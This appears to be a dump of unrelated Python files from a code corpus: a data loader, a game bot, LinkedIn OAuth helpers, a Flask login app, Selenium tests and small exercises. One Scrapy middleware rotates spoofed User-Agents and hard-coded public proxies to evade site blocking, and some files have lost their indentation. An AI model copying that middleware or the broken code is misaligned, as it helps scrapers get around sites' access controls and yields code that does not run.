revertir = lambda cadena: cadena[::-1]
print(revertir("hola calahonda"))
sumar = lambda x,y: x+y
print(sumar(5,9)) |
999,467 | d8f41ae5f5fc7898d2c0ae8cbdcf117ce623ed91 | # -*- coding:utf-8 -*-
import numpy as np
import h5py
def load_cv(FOLD_FOR_TEST):
# X
h5 = h5py.File('../DATA-CROP-RAW-IN-IS.mat', 'r')
X = h5['X'][:]
X = np.reshape(X, [X.shape[0], X.shape[1], X.shape[2], 1])# 1 channel
# Y
Y = h5['LBL'][:]
Y = np.hstack(Y)
Y = np.float32(np.eye(7)[Y])# Y -> onehot
# train val
FOLD = h5['FOLD'][:]
FOLD = np.hstack(FOLD)
TRAIN_X = X[FOLD!=FOLD_FOR_TEST]
VAL_X = X[FOLD==FOLD_FOR_TEST]
TRAIN_Y = Y[FOLD!=FOLD_FOR_TEST]
VAL_Y = Y[FOLD==FOLD_FOR_TEST]
# print shape
print 'TRAIN_X.shape', TRAIN_X.shape
print 'TRAIN_Y.shape', TRAIN_Y.shape
print 'VAL_X.shape', VAL_X.shape
print 'VAL_Y.shape', VAL_Y.shape
return [TRAIN_X, TRAIN_Y, VAL_X, VAL_Y]
|
999,468 | 7b8361d2026c8c6c39565f8333cf7230e95c8bbb | #!/usr/bin/env python
from noos_seed import noos_seed_from_json
# Examples from specification_request_package_v2.0_20190208
# From file
#############
lon, lat, time = noos_seed_from_json('seed_example4.2.json', plot=True)
lon, lat, time = noos_seed_from_json('seed_example4.5.json', plot=True)
# From dict
#############
json_example4_1 = {
'geometry': 'point',
'lon': 2.159,
'lat': 52.1,
'radius': 1000,
'number': 2500,
'time': '2018-10-17T13:07:12z'
}
lon, lat, time = noos_seed_from_json(json_example4_1, plot=True)
json_example_cone = {
'geometry': 'point',
'lon': [2.159, 2.3],
'lat': [52.1, 52.12],
'radius': [10, 200],
'number': 2500,
'time': ['2018-10-17T12:00:00z', '2018-10-17T18:00:00z']
}
lon, lat, time = noos_seed_from_json(json_example_cone, plot=True)
|
999,469 | a4511170ea7b4f72243f2d852c38db888e5c6b7a | from .Nissan import Nissan
|
999,470 | a9f22100fbdcd1b9ceaeb1db2ce121334b58e045 | from PlayGame import *
from Agent import *
import multiprocessing
def writeStrategy(filename, dataname):
f = open(filename, 'a')
for i in dataname.keys():
f.write("(" + str(i[0]) + "," + str(i[1]) + ")" + ': {')
for j in dataname[i].keys():
f.write(str(j) + ": " + str(dataname[i][j]) + ", ")
f.write("}")
f.write("\n")
if __name__ == "__main__":
pool = multiprocessing.Pool(processes = 4)
agentActList = []
agent0List = [agent(agentId=0, startLocIndex=0) for x in range(4)]
agent1List = [agent(agentId=1, startLocIndex=2) for x in range(4)]
for i in range(4):
agentActList.append(pool.apply_async(runGame, (agent0List[i], agent1List[i])))
pool.close()
pool.join()
for res in agentActList:
print(res.get()[0])
writeStrategy("Agent0_Strategy.txt", res.get()[1])
writeStrategy("Agent1_Strategy.txt", res.get()[2])
|
999,471 | 67e070a591ee33e7f46a820af5de0dc939721b4e | from fastapi import FastAPI
from oxigraph_admin.api import middleware
from oxigraph_admin.api import api_v1
from oxigraph_admin import settings
tags_metadata = [
{
'name': 'Security',
'description': 'Manage security settings.'
},
{
'name': 'Users',
'description': 'Manage authentication and authorization for users.'
},
{
'name': 'SPARQL Protocol Service',
'description': 'Proxy endpoints to interface directly with Oxigraph Server, protected by the Security middleware.'
}
]
def create_app():
app = FastAPI(title='Oxigraph Admin API', openapi_tags=tags_metadata)
app.include_router(api_v1.api.api_router_v1, prefix=settings.API_V1_STR)
app.add_middleware(middleware.SecurityMiddleware)
return app
|
999,472 | 0cf91dd8006ddd610ef41cd86be6492f7bdc0bf4 | # pylint: disable=C0103, too-few-public-methods, locally-disabled, no-self-use, unused-argument
'''This module contains various misc helper functions'''
|
999,473 | 9cf55023786c67483ae32007393271136cf090ed | import hlt
from hlt import config, strategies, spawner, ships, tactics, pathfinding, entity, positionals, constants
import logging, time, os
from itertools import product
import pandas as pd
from scipy import signal
import numpy as np
# logging.info("Initializing:")
config.load_constants()
for param in hlt.control.dyno:
for timepoint in hlt.control.dyno[param]:
logging.info(f"0\t{param}\t{timepoint}\t{hlt.control.dyno[param][timepoint]}")
# logging.info("Creating target df:")
hlt.control.all_pos = list()
for x, y in product(range(hlt.control.game.game_map.height), range(hlt.control.game.game_map.height)):
hlt.control.all_pos.append([x, y, None])
hlt.control.is_target[positionals.Position(x, y)] = False
hlt.control.target_df = pd.DataFrame(hlt.control.all_pos, columns=['x', 'y', ''])
hlt.control.target_df = hlt.control.target_df.set_index(['x', 'y'], drop=True)
# logging.info("Filling in all scores:")
search_start_time = time.time()
hlt.control.target_df = hlt.control.target_df.apply(tactics.get_target_score, axis=1)
hlt.control.initial_halite = hlt.control.current_halite
# logging.info(f"{hlt.control.target_df.head()}")
# logging.info(f"Finished score calculations in {time.time() - search_start_time} seconds.")
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},raw\n")
myarr = hlt.control.target_df.unstack()
r = list(range(hlt.control.kernel_radius, 0, -1)) + [0] + list(range(1, hlt.control.kernel_radius))
kernel = [[hlt.control.target_scaling ** (i+j) for j in r] for i in r]
# logging.info(f"{myarr}")
grad = signal.convolve2d(myarr, kernel, boundary='symm', mode='same')
new_df = pd.DataFrame(grad).stack().reindex_like(hlt.control.target_df)
# logging.info(f"{new_df.unstack()}")
# logging.info(f"{new_df}")
hlt.control.target_df = new_df
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},conv\n")
# logging.info(f"{hlt.control.target_df}")
hlt.control.game.ready("highlander") # Respond with your name
while True:
# logging.info("New turn!")
start_time = time.time()
# logging.info("Updating:")
hlt.control.num_eligible_spaces = 0
hlt.control.game.update_frame()
hlt.control.total_ships = 0
ship_nums = list()
for player in hlt.control.game.players.values():
hlt.control.total_ships += len(player.get_ships())
ship_nums.append(len(player.get_ships()))
geometric_mean_ships = 1.0
for num in ship_nums:
geometric_mean_ships *= num
hlt.control.mean_ships_per_player = geometric_mean_ships ** (1/len(hlt.control.game.players.values()))
logging.info(f"{hlt.control.game.turn_number}\ttotal_ships\t{hlt.control.total_ships}")
logging.info(f"{hlt.control.game.turn_number}\tmean_ships\t{hlt.control.mean_ships_per_player}")
# scale all the constants based on game details
# must be done before current halite is set, for efficiency, so it will actually be based on last turn
config.set_progress_details()
strategies.scale_constants()
for tpos in hlt.control.ship_target_loc.values():
hlt.control.is_target[tpos] = True
hlt.control.current_halite = 0
hlt.control.target_df = pd.DataFrame(hlt.control.all_pos, columns=['x', 'y', ''])
hlt.control.target_df = hlt.control.target_df.set_index(['x', 'y'], drop=True)
# logging.info("Filling in all scores:")
hlt.control.target_df = hlt.control.target_df.apply(tactics.get_target_score, axis=1)
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},raw,{hlt.control.game.turn_number}\n")
# logging.info(f"{hlt.control.target_df.head()}")
myarr = hlt.control.target_df.unstack()
grad = signal.convolve2d(myarr, kernel, boundary='symm', mode='same')
new_df = pd.DataFrame(grad).stack().reindex_like(hlt.control.target_df)
hlt.control.target_df = new_df
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},conv,{hlt.control.game.turn_number}\n")
# logging.info(f"{hlt.control.target_df}")
hlt.control.coms = list() # command queue
hlt.control.ships = hlt.control.game.me.get_ships()
hlt.control.current_ship_locs = list()
hlt.control.ships_at_max = 0
# get all dropoff adjacent positions:
dropoffs = [do.position for do in hlt.control.game.me.get_dropoffs()]
dropoffs.append(hlt.control.game.me.shipyard.position)
hlt.control.my_dropoffs = dropoffs
hlt.control.adj_posis = list()
for pos in hlt.control.my_dropoffs:
for dx in range(-2, 3):
for dy in range(-2, 3):
if abs(dx) + abs(dy) <= 2:
test_pos = hlt.control.game.game_map.normalize(positionals.Position(pos.x + dx, pos.y + dy))
hlt.control.adj_posis.append(test_pos)
hlt.control.close_adj_posis = list()
for pos in hlt.control.my_dropoffs:
for dx in range(-1, 2):
for dy in range(-1, 2):
if abs(dx) + abs(dy) <= 1:
test_pos = hlt.control.game.game_map.normalize(positionals.Position(pos.x + dx, pos.y + dy))
hlt.control.close_adj_posis.append(test_pos)
# logging.info(f"{hlt.control.adj_posis }")
if hlt.control.ships:
ship_tar_df = hlt.control.target_df.copy()
ship_tar_df = ship_tar_df.sort_values(ascending=False)
cutoff = round((
(len(ship_tar_df.index) ** 2) * (
hlt.control.target_percentile_cutoff / len(hlt.control.ships)
)
))
cutoff = max(len(hlt.control.ship_target_loc.values()) + 300, cutoff)
# logging.info(f"{cutoff}")
hlt.control.ship_tar_df = ship_tar_df.head(n=int(cutoff))
# get ships at max
for ship in hlt.control.ships:
if ship.halite_amount >= hlt.control.minimum_halite_to_collect:
hlt.control.ships_at_max += 1
# logging.info("Getting Ship Roles:")
builders = list()
for ship in hlt.control.ships:
if ship.id not in hlt.control.ship_role:
hlt.control.ship_role[ship.id] = "new"
ships.get_role(ship)
if hlt.control.ship_role[ship.id] == "builder":
builders.append(ship)
if len(builders) >= 1:
hlt.control.building_dropoff = True
else:
hlt.control.building_dropoff = False
# logging.info("{}".format(time.time() - start_time))
# spawn if needed, must be done after the ships locs list is populated
hlt.control.spawning = False
if spawner.spawn_check():
# logging.info("Spawning.")
spawner.spawn()
logging.info(f"{hlt.control.game.turn_number}\tspawning\t{hlt.control.spawning}")
# logging.info("Commanding Ships:")
# get commands for each ship
# command the harvesters first, as I care about them more
unseen_shipsZ = list()
unseen_shipsY = list()
unseen_ships0 = list()
unseen_ships1 = list()
unseen_ships2 = list()
unseen_ships3 = list()
unseen_ships4 = list()
for ship in hlt.control.ships:
if ship.position in hlt.control.my_dropoffs:
msg = ships.get_command(ship)
else:
unseen_shipsY.append(ship)
for ship in unseen_shipsY:
if ship.position in hlt.control.close_adj_posis and hlt.control.ship_target_loc[ship.id] not in hlt.control.close_adj_posis:
msg = ships.get_command(ship)
else:
unseen_shipsZ.append(ship)
for ship in unseen_shipsZ:
if ship.position in hlt.control.adj_posis and hlt.control.ship_target_loc[ship.id] not in hlt.control.adj_posis:
msg = ships.get_command(ship)
else:
unseen_ships0.append(ship)
for ship in unseen_ships0:
if hlt.control.ship_role[ship.id] == "builder":
msg = ships.get_command(ship)
else:
unseen_ships1.append(ship)
for ship in unseen_ships1:
if hlt.control.ship_role[ship.id] == "harvester":
msg = ships.get_command(ship)
else:
unseen_ships2.append(ship)
for ship in unseen_ships2:
if ship.position == hlt.control.ship_target_loc[ship.id]:
msg = ships.get_command(ship)
else:
unseen_ships3.append(ship)
for ship in unseen_ships3:
msg = ships.get_command(ship)
# logging.info("{}".format(time.time() - start_time))
logging.info(f"{hlt.control.game.turn_number}\truntime\t{time.time() - start_time}")
# logging.info("Ending Turn.")
# Send your moves back to the game environment, ending this turn.
hlt.control.game.end_turn(hlt.control.coms)
|
999,474 | c3a32200b65844a13a99097645fe7e1dcf3f3fb6 |
import requests
import oauth2 as oauth
import urllib
import urlparse
from webapp import settings
from webapp.settings import LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI
request_token_url = 'https://api.linkedin.com/uas/oauth/requestToken'
authorize_url = 'https://api.linkedin.com/uas/oauth/authorize'
access_token_url = 'https://api.linkedin.com/uas/oauth/accessToken'
authenticate_url = 'https//www.linkedin.com/uas/oauth/authenticate'
class LinkedIn(object):
def __init__(self, api_key=None, api_secret=None, redirect_uri=None):
self.api_key = api_key
self.api_secret = api_secret
self.redirect_uri = redirect_uri
def build_url(self, request={}):
# Get a request token. This is a temporary token that is used for
# having the user authorize an access token and to sign the request to obtain
# said access token.
consumer = oauth.Consumer(self.api_key, self.api_secret)
client = oauth.Client(consumer)
resp, content = client.request(request_token_url, "POST", body=urllib.urlencode({'oauth_callback':self.redirect_uri}))
print content
if resp['status'] != '200':
if settings.DEBUG:
raise ApiError("%s: %s" % (resp['status'], resp['content']))
else:
raise ApiError("Error returned from API")
request_token = dict(urlparse.parse_qsl(content))
# Redirect the user to the authentication URL.
url = "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
print "url = %s" % url
return url, request_token
def authorize(self, oauth_verifier=None, request_token=None):
print "authorize... "
consumer = oauth.Consumer(self.api_key, self.api_secret)
token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])
token.set_verifier(oauth_verifier)
client = oauth.Client(consumer, token)
resp, content = client.request(access_token_url, "POST")
access_token = dict(urlparse.parse_qsl(content))
return access_token
def create_client(self, access_key=None, access_secret=None):
consumer = oauth.Consumer(self.api_key, self.api_secret)
token = oauth.Token(key=access_key, secret=access_secret)
client = oauth.Client(consumer, token)
return client
def refresh_token(self):
# Get a request token
consumer = oauth.Consumer(self.api_key, self.api_secret)
client = oauth.Client(consumer)
resp, content = client.request(request_token_url, "POST", body=urllib.urlencode({'oauth_callback':self.redirect_uri}))
if resp['status'] != '200':
if settings.DEBUG:
raise ApiError("%s: %s" % (resp['status'], resp['content']))
else:
raise ApiError("Error returned from API")
request_token = dict(urlparse.parse_qsl(content))
url = "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
resp, content = client.request(url, "POST")
access_token = dict(urlparse.parse_qsl(content))
return access_token
class LinkedInHelper(object):
def __init__(self, request_token=None):
self.request_token = request_token
@classmethod
def get_authorize_url(self, service=None):
print service
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
url, self.request_token = api.build_url()
return url
@classmethod
def get_access_token(self, oauth_verifier=None):
print "get linkedin access token"
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
access_token = api.authorize(oauth_verifier=oauth_verifier, request_token=self.request_token)
oauth_token = access_token['oauth_token']
oauth_token_secret = access_token['oauth_token_secret']
oauth_expires_in = access_token['oauth_expires_in']
return oauth_token, oauth_token_secret, oauth_expires_in
@classmethod
def create_linkedin_client(self, key=None, secret=None):
print "create linkedin client"
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
print "api ok"
linkedin_client = api.create_client(key, secret)
return linkedin_client
def refresh_access_token(self):
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
access_token = api.refresh_token()
oauth_token = access_token['oauth_token']
oauth_token_secret = access_token['oauth_token_secret']
oauth_expires_in = access_token['oauth_expires_in']
return oauth_token, oauth_token_secret, oauth_expires_in
class ApiError(Exception):
pass
|
999,475 | a2c57d97e7ea0e0ecfb49bcff63d17d569e16fa4 | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
import random
class UserAgentDownloadMiddleware(object):
USER_AGENT = [
'Mozilla/5.0 (Macintosh U Intel Mac OS X 10_6_8 en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows U Windows NT 6.1 en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows NT 10.0 WOW64 rv:38.0) Gecko/20100101 Firefox/38.0',
'Mozilla/5.0 (compatible MSIE 9.0 Windows NT 6.1 Trident/5.0',
'Mozilla/4.0 (compatible MSIE 8.0 Windows NT 6.0 Trident/4.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.0)',
'Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)',
'Mozilla/5.0 (Macintosh Intel Mac OS X 10.6 rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1 rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh Intel Mac OS X 10.6.8 U en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1 U en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Maxthon 2.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 TencentTraveler 4.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 The World)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 360SE)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Avant Browser)',
]
def process_request(self, request, spider):
user_agent = random.choice(self.USER_AGENT)
request.headers['User-Agent'] = user_agent
class IPProxyDownloadMiddleware(object):
PROXY_LIST = ['202.104.113.35:53281', '221.210.120.153:54402', '124.235.135.87:80', '222.171.251.43:40149',
'14.118.135.10:808', '183.3.150.210:41258', '121.33.220.158:808', '61.135.217.7:80',
'58.53.128.83:3128', '124.243.226.18:8888', '61.160.247.63:808', '117.114.149.66:53281',
'180.104.107.46:45700', '60.191.201.38:45461', '27.29.44.177:8118', '118.187.58.34:53281',
'221.224.136.211:35101', '116.192.175.93:41944', '106.12.7.54:8118', '171.38.27.127:8123',
'27.44.218.109:80', '61.135.155.82:443', '124.235.181.175:80', '106.15.42.179:33543',
'219.238.186.188:8118', '219.234.5.128:3128', '119.123.177.32:8888', '58.215.140.6:8080',
'58.52.170.225:808', '123.157.206.135:80', '139.199.38.182:8118']
def process_request(self, request, spider):
if 'proxy' not in request.meta:
proxy_temp = self.get_proxy
request.meta['proxy'] = proxy_temp
def process_response(self, request, response, spider):
if response.status != 200:
return request
return response
@property
def get_proxy(self):
return 'https://' + random.choice(self.PROXY_LIST)
|
999,476 | 3095477cc6a4a0bd7578b147d0fe6b88f786cbcb | import datetime
from typing import Dict, Union
from core.enums import ItemTypes
from core.locale import _
DEFAULT_ITEM_PRICES = {
ItemTypes.CURSOR: 30,
ItemTypes.CPU: 100,
ItemTypes.CPU_STACK: 1000,
ItemTypes.COMPUTER: 10000,
ItemTypes.SERVER_VK: 50000,
ItemTypes.QUANTUM_PC: 200000,
ItemTypes.DATACENTER: 5000000
}
ITEM_STATS = {
ItemTypes.CURSOR: 1,
ItemTypes.CPU: 3,
ItemTypes.CPU_STACK: 10,
ItemTypes.COMPUTER: 30,
ItemTypes.SERVER_VK: 100,
ItemTypes.QUANTUM_PC: 500,
ItemTypes.DATACENTER: 1000
}
ITEMS_AVAILABLE = [
ItemTypes.CURSOR,
ItemTypes.CPU,
ItemTypes.CPU_STACK,
ItemTypes.COMPUTER,
ItemTypes.SERVER_VK,
ItemTypes.QUANTUM_PC,
ItemTypes.DATACENTER
]
class BotWallet(object):
def __init__(self):
self.place = 0
self.score = 0
self.tick = 0
self.items = dict()
self.item_prices = DEFAULT_ITEM_PRICES.copy()
self.hourly_rate = 0
def get_player_score_report(self) -> str:
score = round(int(self.score) / 1000, 3)
speed = round(int(self.tick) / 1000, 2)
return _('Coins: {} | Speed: {} / tick | Place: {}').format(score, speed, self.place)
def get_player_items_report(self) -> str:
return ' | '.join(["{}: {}".format(_(key), value) for (key, value) in self.items.items()])
def get_player_stats_report(self) -> str:
hourly_rate = self.hourly_rate / 1000
return _("Hourly rate: {}").format(hourly_rate)
def set_score(self, score: any) -> None:
self.score = int(score)
self.on_update()
def set_place(self, place: str) -> None:
self.place = place
self.on_update()
def set_tick(self, tick: any) -> None:
self.tick = tick
self.calculate_hourly_rate()
self.on_update()
def update_items(self, items: Dict) -> None:
self.items = {item: 0 for item in ITEMS_AVAILABLE}
for item in items:
if item in ITEMS_AVAILABLE:
self.items[item] = self.items[item] + 1
self.update_item_prices()
self.on_update()
def _calculate_item_price(self, default_price, count) -> int:
if count < 1:
return default_price
return round(1.3 * self._calculate_item_price(default_price, count - 1))
def calculate_item_price(self, item: ItemTypes) -> int:
default_price = DEFAULT_ITEM_PRICES.get(item)
item_count = self.items.get(item, 0)
return self._calculate_item_price(default_price, item_count)
def update_item_prices(self) -> None:
for item in self.item_prices.keys():
self.item_prices[item] = self.calculate_item_price(item)
def has_player_enough_coins_to_buy(self, item: str) -> bool:
self.update_item_prices()
item_price = self.item_prices.get(item, 0)
return self.score > item_price
def calculate_hourly_rate(self) -> None:
self.hourly_rate = self.tick * 3600
def calculate_goal_time(self, goal: int) -> datetime.timedelta:
if goal < self.score / 1000 or (self.tick / 1000) == 0:
seconds = 0
else:
amount = goal - self.score / 1000
seconds = amount // (self.tick / 1000)
return datetime.timedelta(seconds=seconds)
def on_update(self) -> any:
pass
def get_best_item_to_buy(self) -> Union[ItemTypes, None]:
if not self.items or not self.item_prices:
return None
sorted_by_price_items = sorted(self.items, reverse=True, key=lambda i: self.item_prices[i])
best_item = sorted_by_price_items[0]
for item in sorted_by_price_items[1::]:
best_item_price = self.item_prices[best_item]
best_item_efficiency = (self.items[best_item] + 1) * ITEM_STATS[best_item]
item_efficiency = (self.items[item] + 1) * ITEM_STATS[item]
item_price = self.item_prices[item]
diff = best_item_price // item_price
if diff > 1:
efficiency_diff = best_item_efficiency - item_efficiency * diff
if efficiency_diff < 0:
best_item = item
return best_item
|
999,477 | c379b3d86ed26e0d48c8b114257ff0c81e623fc3 | from .ItemReader import read_items
from random import randint
items_collection = {
'boot': read_items('botas'),
'weapon': read_items('armas'),
'helmet': read_items('cascos'),
'glove': read_items('guantes'),
'armor': read_items('pecheras')
}
def items(type):
return items_collection[type]
class ItemGen:
def __init__(self, type, id):
item = items(type)[id]
self._type = type
self._id = id
self._str = item['str']
self._agi = item['agi']
self._dex = item['dex']
self._res = item['res']
self._vit = item['vit']
@property
def str(self):
return self._str
@property
def agi(self):
return self._agi
@property
def dex(self):
return self._dex
@property
def res(self):
return self._res
@property
def vit(self):
return self._vit
@property
def id(self):
return self._id
@property
def type(self):
return self._type
def mutate(self):
r = self.id
while r == self.id:
r = randint(0, len(items(self.type)) - 1)
return ItemGen(self.type, r)
def __repr__(self):
return f'{self.type} [id: {self.id}]'
def __eq__(self, other):
if isinstance(self, other.__class__):
return self._id == other._id and self._type == other._type
return False
def __hash__(self):
return hash((self.type, self.id))
|
999,478 | 340227221b28c86f235553d1391462a788ae8ead | class GroupAddError(Exception):
## raised when the group object gets a non-addable object (non group or engine object) ##
__module__ = Exception.__module__
def __init__(self, inst, class_type):
"""
instance inst - the illegal instance that is added to a group
type class_type - the type of instance inst
"""
self.type = str(class_type)[7:]
self.type = self.type[:-1]
self.inst = inst
return
def __str__(self):
return f"instance '{self.inst}' of class type {self.type} cannot be added to a Group" |
999,479 | 25ecec114df46d534e73c213dd4fd6e3cbf91e5e | from flask import render_template, url_for, flash, redirect, session
from datetime import timedelta
from functools import wraps
from app import app
from passlib.hash import sha256_crypt
import app.forms as forms
import app.dbconnection as db
import app.helpers as hp
@app.before_request
def before_request():
session.permanent = True
app.permanent_session_lifetime = timedelta(minutes=20)
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash("By uzyskać dostęp do tej strony musisz być zalogowany.", "danger")
return redirect(url_for('login'))
return wrap
@app.route('/')
def default():
if 'logged_in' in session:
return redirect(url_for('main'))
return redirect('login')
@app.route('/main')
@login_required
def main():
perm = hp.find_rights(session['username'])
return render_template('main.html', perm=perm, title='Strona główna')
@app.route('/plan', methods=['GET', 'POST'])
@login_required
def plan():
perm = hp.find_rights(session['username'])
form = forms.Plan()
form = hp.create_service_view(form)
if form.validate_on_submit():
hp.add_service_to_db(form)
flash(f'Pomyślnie dodano nowe zgłoszenie na dzień {form.date.data}.', 'success')
return redirect('main')
return render_template('plan.html', perm=perm, form=form, title='Zaplanuj')
@app.route('/orders_list')
@login_required
def orders_list():
perm = hp.find_rights(session['username'])
data = hp.create_orders_list_view()
return render_template('orders_list.html', data=data, perm=perm, title='Wykaz zleceń')
@app.route('/supplies_list')
@login_required
def supplies_list():
perm = hp.find_rights(session['username'])
data = hp.create_supplies_list_view()
return render_template('supplies_list.html', data=data, perm=perm, title='Wykaz zaopatrzenia')
@app.route('/login', methods=['GET', 'POST'])
def login():
if 'logged_in' in session:
flash('Jesteś już zalogowany.', 'danger')
return redirect(url_for('main'))
else:
form = forms.Login()
if form.validate_on_submit():
login = form.login.data
password = str(form.password.data)
if hp.check_if_login_exists(login):
rights = db.find_parameter('konta', 'uprawnienia', 'login', login)
if rights is not 0:
userPassword = db.find_parameter('konta', 'haslo', 'login', login)
if sha256_crypt.verify(password, userPassword):
session['logged_in'] = True
session['username'] = login
flash(f'Cześć {login}!', 'success')
return redirect(url_for('main'))
else:
flash('Aby móc się zalogować musisz posiadać aktywne konto!', 'danger')
return redirect(url_for('login'))
flash('Błędny login lub hasło. Spróbuj ponownie.', 'danger')
return render_template('login.html', form=form, title='Zaloguj')
@app.route('/logout')
@login_required
def logout():
username = session['username']
session.clear()
flash(f"Do zobaczenia {username}!", "success")
return redirect(url_for('login'))
@app.route('/register', methods=['GET', 'POST'])
def register():
form = forms.Register()
if form.validate_on_submit():
login = form.login.data
if not hp.check_if_login_exists(login):
password = sha256_crypt.hash(str(form.password.data))
values = [login, password, form.name.data, form.surname.data]
db.insert_account(values)
flash(f'Pomyślnie stworzono konto. Będzie ono aktywne po akceptacji administratora.', 'success')
return redirect(url_for('login'))
else:
flash('Konto o podanym loginie już istnieje.', 'danger')
return render_template('register.html', form=form, title='Stwórz konto')
|
999,480 | a460604f4060d6372824508786781e9878d8173b | import os
from django.db import models
from project import settings
PART_DATA_FILE = 'static/csv/upload/pdata.csv'
PART_FAIL_FILE = 'static/csv/upload/pfail.csv'
class PartDataFile(models.Model):
class Meta:
db_table = 'part_data_file'
def content_file_name(instance, filename):
return PART_DATA_FILE
file = models.FileField(upload_to=content_file_name)
uploaded = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
print("[Debug] Upload part data file begin")
upload_path = os.path.join(settings.BASE_DIR, PART_DATA_FILE)
if os.path.isfile(upload_path):
os.remove(upload_path)
super(PartDataFile, self).save(*args, **kwargs)
print("[Debug] Save part data file completed")
class PartFailFile(models.Model):
class Meta:
db_table = 'part_fail_file'
def content_file_name(instance, filename):
return PART_FAIL_FILE
file = models.FileField(upload_to=content_file_name)
uploaded = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
print("[Debug] Upload part fail file begin")
upload_path = os.path.join(settings.BASE_DIR, PART_FAIL_FILE)
if os.path.isfile(upload_path):
os.remove(upload_path)
super(PartFailFile, self).save(*args, **kwargs)
print("[Debug] Save part fail file completed")
|
999,481 | a47b385484aec906f63eb84f71d47c9e803fbb73 | import time
from selenium import webdriver
import unittest
from opensource_demo_orangehrmlive.POMProject.Pages.loginPage import LoginPage
from opensource_demo_orangehrmlive.POMProject.Pages.homePage import HomePage
import HtmlTestRunner
class LoinTest(unittest.TestCase):
@classmethod
def setUp(Self):
Self.driver = webdriver.Chrome()
Self.driver.implicitly_wait(5)
Self.driver.maximize_window()
def test_01_login_valid(self):
driver = self.driver
driver.get("https://opensource-demo.orangehrmlive.com/")
login = LoginPage(driver)
login.enter_username("Admin")
login.enter_password("admin123")
login.click_login()
homepage = HomePage(driver)
time.sleep(2)
homepage.click_welcome()
homepage.click_logout()
def test_02_login_invalid_username(self):
driver = self.driver
driver.get("https://opensource-demo.orangehrmlive.com/")
login = LoginPage(driver)
login.enter_username("Admin1")
login.enter_password("admin123")
login.click_login()
message = driver.find_element_by_xpath("//span[@id='spanMessage']").text
self.assertEqual(message, "Invalid credentials")
@classmethod
def tearDown(self):
self.driver.quit()
print("Test completed")
if __name__ == '__main__':
unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output="D:/Other/python/reports"))
|
999,482 | 5cb35cc33b7635e28ad578e7ef0fbc674e53996f | #!/usr/python env
# class to represent node in bst
class Node(object):
def __init__(self, value):
# value of the node
self.value = value
# left child of the current node
self.left = None
# right child of the current node
self.right = None
# parent node of current node
self.parent = None
|
999,483 | 9d153197f8b1d9572251835949ccdf51e2f89d42 | from django import forms
from core.orders.models import Order
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, Row, Column
class OrderCreateForm(forms.ModelForm):\
class Meta:
model = Order
fields = ['first_name', 'last_name', 'email', 'address', 'postal_code', 'city']
def __init__(self, *args, **kwargs):
super(OrderCreateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Row(
Column('first_name', css_class='form-group col-md-6 mb-0'),
Column('last_name', css_class='form-group col-md-6 mb-0'),
css_class='form-row'
),
'email',
Row(
Column('address', css_class='form-group col-md-6 mb-0'),
Column('city', css_class='form-group col-md-4 mb-0'),
Column('postal_code', css_class='form-group col-md-2 mb-0'),
css_class='form-row'
),
Submit('submit', 'Оплатить')
)
|
999,484 | 4f3a97fc2291d4986624c7bbbfb992833bff93bf | from .dribble_ball import *
from .action import *
from .helper_functions import *
from .move_to import *
from .Goalie import *
from .robot import *
|
999,485 | e23935673d77c642c60039106f4844b3d5e6737a | #!/usr/bin/python
from multiprocessing import Process, Pool, Queue
import time
import random
def f(x):
print x*x
time.sleep(random.randint(1, 10))
return x
if __name__ == '__main__':
pool = Pool(processes=4)
result = pool.map(f, range(100))
print result |
999,486 | 5902dc7eb145b4bb8319a9734458dcb40d868751 | class Solution:
def majorityElement(self, nums: List[int]) -> int:
# 开心消消乐,不一样的两个数相互抵消掉,剩下最后一个(或n)个数就是众数
stack = []
for item in nums:
if len(stack) == 0:
stack.append(item)
else:
if stack[-1] != item:
stack.pop()
else:
stack.append(item)
return stack[-1] |
